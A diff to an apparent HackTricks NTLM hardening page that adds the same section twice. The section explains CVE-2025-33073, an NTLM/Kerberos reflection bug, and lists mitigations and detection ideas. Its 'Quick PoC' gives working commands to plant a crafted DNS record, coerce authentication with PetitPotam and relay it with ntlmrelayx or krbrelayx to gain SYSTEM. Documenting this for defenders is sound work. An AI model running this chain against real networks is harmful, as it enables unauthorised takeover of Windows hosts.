diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md index 7672ac0b8f4..4326a3f0832 100644 --- a/src/windows-hardening/ntlm/README.md +++ b/src/windows-hardening/ntlm/README.md @@ -2,6 +2,55 @@ {{#include ../../banners/hacktricks-training.md}} +## NTLM & Kerberos *Reflection* via Serialized SPNs (CVE-2025-33073) + +Windows contains several mitigations that try to prevent *reflection* attacks where an NTLM (or Kerberos) authentication that originates from a host is relayed back to the **same** host to gain SYSTEM privileges. + +Microsoft broke most public chains with MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) and later patches, however **CVE-2025-33073** shows that the protections can still be bypassed by abusing how the **SMB client truncates Service Principal Names (SPNs)** that contain *marshalled* (serialized) target-info. + +### TL;DR of the bug +1. An attacker registers a **DNS A-record** whose label encodes a marshalled SPN – e.g. + `srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` +2. The victim is coerced to authenticate to that hostname (PetitPotam, DFSCoerce, etc.). +3. When the SMB client passes the target string `cifs/srv11UWhRCAAAAA…` to `lsasrv!LsapCheckMarshalledTargetInfo`, the call to `CredUnmarshalTargetInfo` **strips** the serialized blob, leaving **`cifs/srv1`**. +4. `msv1_0!SspIsTargetLocalhost` (or the Kerberos equivalent) now considers the target to be *localhost* because the short host part matches the computer name (`SRV1`). +5. Consequently, the server sets `NTLMSSP_NEGOTIATE_LOCAL_CALL` and injects **LSASS’ SYSTEM access-token** into the context (for Kerberos a SYSTEM-marked subsession key is created). +6. Relaying that authentication with `ntlmrelayx.py` **or** `krbrelayx.py` gives full SYSTEM rights on the same host. + +### Quick PoC +```bash +# Add malicious DNS record +dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ + -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ + -d 10.10.10.50 + +# Trigger authentication +PetitPotam.py -u user -p pass -d DOMAIN \ + srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL + +# Relay listener (NTLM) +ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support + +# Relay listener (Kerberos) – remove NTLM mechType first +krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support +``` + +### Patch & Mitigations +* KB patch for **CVE-2025-33073** adds a check in `mrxsmb.sys::SmbCeCreateSrvCall` that blocks any SMB connection whose target contains marshalled info (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). +* Enforce **SMB signing** to prevent reflection even on unpatched hosts. +* Monitor DNS records resembling `*...*` and block coercion vectors (PetitPotam, DFSCoerce, AuthIP...). + +### Detection ideas +* Network captures with `NTLMSSP_NEGOTIATE_LOCAL_CALL` where client IP ≠ server IP. +* Kerberos AP-REQ containing a subsession key and a client principal equal to the hostname. +* Windows Event 4624/4648 SYSTEM logons immediately followed by remote SMB writes from the same host. + +## References +* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) +* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) + + + ## Basic Information In environments where **Windows XP and Server 2003** are in operation, LM (Lan Manager) hashes are utilized, although it's widely recognized that these can be easily compromised. A particular LM hash, `AAD3B435B51404EEAAD3B435B51404EE`, indicates a scenario where LM is not employed, representing the hash for an empty string. @@ -296,7 +345,53 @@ The PoC can be found in **[https://github.com/eladshamir/Internal-Monologue](htt **You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) -{{#include ../../banners/hacktricks-training.md}} +## NTLM & Kerberos *Reflection* via Serialized SPNs (CVE-2025-33073) + +Windows contains several mitigations that try to prevent *reflection* attacks where an NTLM (or Kerberos) authentication that originates from a host is relayed back to the **same** host to gain SYSTEM privileges. + +Microsoft broke most public chains with MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) and later patches, however **CVE-2025-33073** shows that the protections can still be bypassed by abusing how the **SMB client truncates Service Principal Names (SPNs)** that contain *marshalled* (serialized) target-info. + +### TL;DR of the bug +1. An attacker registers a **DNS A-record** whose label encodes a marshalled SPN – e.g. + `srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` +2. The victim is coerced to authenticate to that hostname (PetitPotam, DFSCoerce, etc.). +3. When the SMB client passes the target string `cifs/srv11UWhRCAAAAA…` to `lsasrv!LsapCheckMarshalledTargetInfo`, the call to `CredUnmarshalTargetInfo` **strips** the serialized blob, leaving **`cifs/srv1`**. +4. `msv1_0!SspIsTargetLocalhost` (or the Kerberos equivalent) now considers the target to be *localhost* because the short host part matches the computer name (`SRV1`). +5. Consequently, the server sets `NTLMSSP_NEGOTIATE_LOCAL_CALL` and injects **LSASS’ SYSTEM access-token** into the context (for Kerberos a SYSTEM-marked subsession key is created). +6. Relaying that authentication with `ntlmrelayx.py` **or** `krbrelayx.py` gives full SYSTEM rights on the same host. + +### Quick PoC +```bash +# Add malicious DNS record +dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ + -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ + -d 10.10.10.50 + +# Trigger authentication +PetitPotam.py -u user -p pass -d DOMAIN \ + srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL +# Relay listener (NTLM) +ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support + +# Relay listener (Kerberos) – remove NTLM mechType first +krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support +``` + +### Patch & Mitigations +* KB patch for **CVE-2025-33073** adds a check in `mrxsmb.sys::SmbCeCreateSrvCall` that blocks any SMB connection whose target contains marshalled info (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). +* Enforce **SMB signing** to prevent reflection even on unpatched hosts. +* Monitor DNS records resembling `*...*` and block coercion vectors (PetitPotam, DFSCoerce, AuthIP...). + +### Detection ideas +* Network captures with `NTLMSSP_NEGOTIATE_LOCAL_CALL` where client IP ≠ server IP. +* Kerberos AP-REQ containing a subsession key and a client principal equal to the hostname. +* Windows Event 4624/4648 SYSTEM logons immediately followed by remote SMB writes from the same host. + +## References +* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) +* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) + +{{#include ../../banners/hacktricks-training.md}}